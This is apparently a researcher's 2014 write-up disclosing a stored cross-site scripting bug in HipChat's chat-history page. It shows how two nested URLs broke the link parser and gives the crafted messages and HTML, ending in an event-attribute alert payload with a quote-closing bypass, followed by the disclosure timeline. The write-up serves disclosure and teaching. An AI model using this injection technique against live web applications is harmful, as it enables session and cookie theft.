HipChat XSS vulnerability

November 24, 2014

HipChat is a popular web service for private chat and instant messaging. It features a lot of things, one of that is ability to view chat history via browser and search through it. In this write-up I want to tell you about vulnerability in that page which could be used to compromise user’s account, steal credentials or other sensitive data.

Once during communication with colleagues I discovered that some messages in web history were not displayed as the same messages in chat. I noticed that such message:

message in chat

at chat history’s page looked so:

message in history

That seemed a bit strange, I started to research why exactly this message caused a glitch. Tried some variations of message above and finally understood the format of message that was leading this bug:

http://example.com/test http://example.com

Message should have contained two urls so that one url should have been a component of another. Let’s take a look at html code of such message in history page:

<div class="hc-chat-msg">
  <div>
    <a href="&lt;a href=" http:="" example.com"="">http://example.com</a>/test"&gt;<a href="http://example.com" target="_blank">http://example.com</a>/test <a href="http://example.com" target="_blank">http://example.com</a>
  </div>
</div>

So what did exactly happened? Check out that fragment of html:

<a href="&lt;a href=" http:="" example.com"="">http://example.com</a>/test"

Somehow the second url is splitting and its pieces are being appended to <a> as attributes. To confirm this behaviour I sent a such message:

http://example.com/style/test http://example.com/style

In html got such thing:

<a href="&lt;a href=" http:="" example.com="" style"="">http://example.com/style</a>

As you can see attribute was successfully set. After, I tried to pass some value to this attribute:

http://example.com/style=font-size:30px;/test http://example.com/style=font-size:30px;

->

<a href="&lt;a href=" http:="" example.com="" style="font-size:30px&quot;">

; symbol is being escaped and &quot; is being appended to the end of value, so the value is becoming invalid…

..but, &quot; is a special html character that means ". So.. I just closed this quote:)

http://example.com/style=font-size:30px;"/test http://example.com/style=font-size:30px;"

aand bingo finally got such html

<a href="&lt;a href=" http:="" example.com="" style="font-size:30px;&amp;quot&quot;">http://example.com/style=font-size:30px;"</a>

with a valid value in style attribute:

style of message changed

Attacker was able to reproduce similar thing with any other html attribute, not a style only. For example: Event Attributes:

http://example.com/onmousemove=javascript:eval(alert("PWNED"));"pwned/ http://example.com/onmousemove=javascript:eval(alert("PWNED"));"pwned

"pwned is required, because HipChat in the end of attr’s value appended &quot; sym and js execution have been interrupted. In that situation "pwned helped to me to bypass this workaround since &quot;pwned&quot; is "pwned" i.e., just a string.

<a href="&lt;a href=" http:="" example.com="" onmousemove="javascript:eval(alert("PWNED"));&quot;pwned&quot;">http://example.com/onmousemove=javascript:eval(alert("PWNED"));"pwned</a>

xss in hipchat

Using this vulnerability attacker was able to steal user’s cookies and other sensitive information or do some other malicious job with account.

  • 28.10.2014 - sent an email to Atlassian Security Team; They immediately filed an issue in JIRA
  • 08.11.2014 - issue in HipChat’s url parser has been fixed; Atlassian thanked for the help and gave me a coupon to their store :3

Thanks for reading!